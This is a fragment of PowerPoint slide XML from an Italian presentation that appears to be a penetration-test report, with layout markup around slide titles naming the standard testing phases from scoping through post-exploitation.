                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC90CC3D-05EE-6228-5A5A-6E9C219BAEAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718908" y="2803267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Uno sguardo agli strumenti utilizzati nelle varie fasi</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B793AF34-6614-AEA2-96F9-B50AE3CFF52E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629417" y="242871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Strumenti Utilizzati</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{911EC704-3F17-828E-E68E-CD745D28D0A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630720" y="1543260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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11B312B6-A920-5A54-5724-D7CF16D56138}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3476318" y="28033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“Scope” di cosa è stato analizzato</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC4F4BB3-1CB0-3FD5-5EC6-F319DCE226E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3386827" y="24288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</a:t>
            </a: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Scoping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Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7B1D64F-9D4F-A16C-C85C-964D00932EA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3388130" y="15433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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2A1E0E7-1AA4-186E-5AEF-8AEF4132AA0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6238940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Recupero delle informazioni</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58708409-AA91-4FC6-7665-6A5061A16B4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6149449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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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Gathering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Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A43A0249-E69B-B8D4-9A81-F8DEDFC6BCE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6150752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it-IT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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6219FA9C-AAF6-4C2A-6056-7244FA6A71BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8993743" y="2803265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della macchina </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B501273F-AFF0-F8BF-F9A6-E80D23535575}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8904252" y="242870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Discovery</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8EF3834-B6F7-56F4-C86A-B487A5C68A08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8905555" y="1543258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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5322EF44-D519-CCB9-7D23-AB6F07BB05E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="719957" y="5284522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Individuazione dei servizi esposti dalla macchina</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4535016-F30C-8954-26C5-82F629890E3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630466" y="490996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Enumerating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Target</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A49380DD-6FA6-B454-5070-7426BFA0D50C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="631769" y="4024515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3" name="Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FBB894C-1FF8-7D81-16BB-969484823587}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3477367" y="52846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Analisi dei problemi di sicurezza della macchina</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEB2C201-EB3D-AD5D-B471-9A67BFBAA78D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3387876" y="49100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Vulnerability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Mapping</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4071A593-F62C-6F5D-6229-96CBDE5FC1C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3389179" y="40246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6" name="Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{974F0F60-73FF-9152-0B82-3AE630A4C40F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6239989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Sfruttamento delle vulnerabilità identificate</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="107" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55A3F5AA-7955-2BD0-810C-4F774F96E6FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6150498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Target Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6D69C5A-300A-813F-52B4-58346641FCDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6151801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9" name="Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71B8FCE1-50DE-B51C-50D9-AEAF9E6F3827}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8994792" y="5284520"/>
            <a:ext cx="2421583" cy="42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Privilege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Escalation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>
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Mantaining</a:t>
            </a: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 Access</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3BAFCFD-E52D-C16E-E72C-CC4CAA299C7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8905301" y="490996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bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Post Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDC0D109-E6E8-8745-A06D-F862BDE306F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8906604" y="4024513"/>
            <a:ext cx="2610671" cy="27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it-I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3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</TotalTime>
  <Words>2724</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>627</Paragraphs>
  <Slides>50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Play</vt:lpstr>
      <vt:lpstr>Source Sans Pro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DE MATTIA</dc:creator>
  <cp:lastModifiedBy>FEDERICO DE MATTIA</cp:lastModifiedBy>
  <cp:revision>15</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-07-14T19:37:48Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-07-18T10:29:46Z</dcterms:modified>
</cp:coreProperties>
</file>